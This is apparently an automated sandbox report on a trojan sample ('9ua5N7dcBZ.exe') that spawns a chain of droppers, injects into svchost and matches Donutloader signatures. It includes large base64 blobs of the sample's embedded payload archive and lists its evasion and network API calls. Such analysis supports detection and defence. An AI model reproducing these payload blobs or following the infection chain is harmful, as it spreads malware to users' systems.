Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: String function: 6D0CD130 appears 115 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: String function: 00883F50 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: String function: 6D0D11C0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: String function: 0088A570 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: String function: 6C4EB840 appears 115 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: String function: 6C4EF230 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: String function: 00607FB0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: String function: 000B7FB0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: String function: 6C83D130 appears 115 times
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: String function: 6C8411C0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: String function: 0087A570 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: String function: 00873F50 appears 136 times

Source: C:\Windows\System32\fontdrvhost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9024 -s 136

Source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameG2M.exe8 vs 9ua5N7dcBZ.exe
Source: 9ua5N7dcBZ.exe, 00000000.00000000.1314924313.000000000092E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGeneratedInstaller.exe4 vs 9ua5N7dcBZ.exe

Source: 9ua5N7dcBZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000013.00000003.1697867340.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000F.00000003.1621387285.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000001.00000002.1336328795.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000003.1460689695.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000002.00000002.1337055476.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 9ua5N7dcBZ.exe, Program.cs	Base64 encoded string: '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
Source: readerupdate2[1].exe.3.dr, Program.cs	Base64 encoded string: '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
Source: readerupdate2.exe.3.dr, Program.cs	Base64 encoded string: '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

Source: 21.3.svchost.exe.2449aabc070.3.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 18.3.svchost.exe.27dcbcbc070.1.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 21.3.svchost.exe.2449aabc070.1.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 18.3.svchost.exe.27dcbcbc070.3.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: readerupdate2[1].exe.3.dr, Program.cs	Suspicious method names: .Program.ExecutePayload
Source: readerupdate2[1].exe.3.dr, Program.cs	Suspicious method names: .Program.ExtractPayload
Source: 21.3.svchost.exe.2449aabc070.0.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 21.3.svchost.exe.2449aabc070.2.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 18.3.svchost.exe.27dcbcbc070.2.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 9ua5N7dcBZ.exe, Program.cs	Suspicious method names: .Program.ExecutePayload
Source: 9ua5N7dcBZ.exe, Program.cs	Suspicious method names: .Program.ExtractPayload
Source: 18.3.svchost.exe.27dcbcbc070.0.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: readerupdate2.exe.3.dr, Program.cs	Suspicious method names: .Program.ExecutePayload
Source: readerupdate2.exe.3.dr, Program.cs	Suspicious method names: .Program.ExtractPayload

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@101/234@22/25

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_6D0C15C0 GetModuleHandleW,FormatMessageW,GetLastError,

1_2_6D0C15C0

Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe

Code function: 2_2_0085E8B0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,Sleep,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,CloseHandle,RemoveDirectoryA,Sleep,CreateFileA,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpSendRequestExA,InternetWriteFile,ReadFile,InternetWriteFile,InternetWriteFile,HttpEndRequestW,CloseHandle,CloseHandle,

2_2_0085E8B0

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9ua5N7dcBZ.exe.log

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-de6f534f-76bf-c015f6-02963c162eb5}
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9024
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-e365c7ff-5559-fcb9b1-869571f430b9}
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\GS-1-5-21-2246122658-3693405117-2476756634-1003{D19BAF17-7C87-467E-8D63-6C4B1C836373}
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Mutant created: \Sessions\1\BaseNamedObjects\9e10aae64ffb8138362fd4ae6e92862f

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe

File created: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6

Jump to behavior

Source: 9ua5N7dcBZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9ua5N7dcBZ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000027.00000002.2026282345.00000145DDCC0000.00000002.00000001.00040000.00000050.sdmp

Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));

Source: 9ua5N7dcBZ.exe	Virustotal: Detection: 54%
Source: 9ua5N7dcBZ.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess	graph_1-47244
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess	graph_2-49352

Source: unknown	Process created: C:\Users\user\Desktop\9ua5N7dcBZ.exe "C:\Users\user\Desktop\9ua5N7dcBZ.exe"
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Process created: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe"
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\fontdrvhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9024 -s 136
